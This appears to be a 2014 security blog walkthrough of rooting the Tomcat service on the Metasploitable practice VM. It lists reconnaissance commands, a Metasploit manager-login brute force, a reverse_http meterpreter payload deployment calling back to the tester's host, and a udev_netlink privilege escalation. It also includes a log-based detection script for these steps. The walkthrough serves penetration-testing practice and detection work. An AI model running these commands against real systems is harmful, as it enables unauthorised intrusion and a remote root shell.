[VIDEO] Gaining Root via the Apache Tomcat Service
Posted in Security Videos | Posted on 09-12-2014
This video demonstrates how to exploit the Apache Tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed for practicing penetration testing.
In this video, I will show you how to scan the system, find one of the vulnerable services, "Apache Tomcat", and then exploit the service to gain root access.
Steps
- Use Netdiscover to get the IP address of our target (Reconnaissance)
- Use Nmap to do a detailed scan of the target (Information Gathering)
- Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
- Use Metasploit to upload and execute the payload (Remote Access)
- Use Metasploit to gain root privileges (Privilege Escalation)
Commands
```
ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami
```
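Seen from the target's side, the manager login brute force and the deployment that follows leave a recognisable sequence in the Tomcat access log. The script below is an added example, not part of the original post or of any tool used in the video. It assumes access logging is enabled in the "common" format, uses an arbitrary threshold of 5 failed logins, and runs on constructed log lines.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Manager endpoints that accept a WAR: text interface (old and new paths) and the HTML upload form.
DEPLOY = re.compile(r'^/manager/(text/)?deploy\b|^/manager/html/upload\b')
THRESHOLD = 5  # assumed cut-off: failed manager logins per client before it counts as guessing

def detect(lines, threshold=THRESHOLD):
    """Return (ip, finding, detail) tuples in the order the events appear."""
    failures = defaultdict(int)
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m or not m['path'].startswith('/manager'):
            continue
        ip, status = m['ip'], int(m['status'])
        if status == 401:  # a browser's first request is also a 401, hence the threshold
            failures[ip] += 1
            if failures[ip] == threshold:
                findings.append((ip, 'password-guessing', f'{threshold} failed manager logins'))
        elif status < 400 and m['user'] != '-':
            if failures[ip] >= threshold:
                findings.append((ip, 'login-after-guessing', f'user={m["user"]}'))
                failures[ip] = 0  # report the transition once
            if m['method'] in ('PUT', 'POST') and DEPLOY.search(m['path']):
                findings.append((ip, 'war-deploy', f'{m["method"]} {m["path"]} as {m["user"]}'))
    return findings

def sample_log():
    """Constructed log lines (not captured traffic); 192.168.61.128 is the lab attacker IP above."""
    ts = '[09/Dec/2014:10:00:00 +0000]'
    guesses = [f'192.168.61.128 - - {ts} "GET /manager/html HTTP/1.1" 401 954'] * 6
    return guesses + [
        f'192.168.61.128 - tomcat {ts} "GET /manager/html HTTP/1.1" 200 12045',
        f'192.168.61.128 - tomcat {ts} "PUT /manager/deploy?path=/example HTTP/1.1" 200 35',
        # Ordinary admin session: one unauthenticated challenge, then a normal page view.
        f'192.168.61.1 - - {ts} "GET /manager/html HTTP/1.1" 401 954',
        f'192.168.61.1 - admin {ts} "GET /manager/html HTTP/1.1" 200 12045',
    ]

if __name__ == '__main__':
    for finding in detect(sample_log()):
        print(*finding, sep='\t')
```

A `war-deploy` finding that follows `login-after-guessing` from the same address is the combination worth alerting on; either one alone can also be routine administration.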
Notes
- Song – Bucie feat Heavy K – Easy to Love
- Video Length – 8 minutes
Conclusion
At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real-world pentest scenario, we would try to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire network.
Kindly use the comment box below for feedback.
– InfosecShinobi